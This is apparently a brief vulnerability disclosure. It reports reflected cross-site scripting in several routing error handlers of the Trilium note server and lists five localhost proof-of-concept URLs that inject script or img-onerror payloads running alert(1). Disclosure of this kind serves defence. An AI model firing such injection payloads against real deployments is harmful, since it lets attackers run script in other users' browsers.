Multiple routing error handlers are vulnerable to reflected XSS.
Deploy trilium
server and access to these endpoint will execute the alert js function.
http://localhost:8080/custom/%3Cscript%3Ealert(1)%3C/script%3E
http://localhost:8080/share/api/notes/%3Cimg%20src=x%20onerror=alert(1)%3E
http://localhost:8080/share/api/notes/%3Cimg%20src=x%20onerror=alert(1)%3E/download
http://localhost:8080/share/api/images/%3Cimg%20src=x%20onerror=alert(1)%3E/filename
http://localhost:8080/share/api/notes/%3Cimg%20src=x%20onerror=alert(1)%3E/view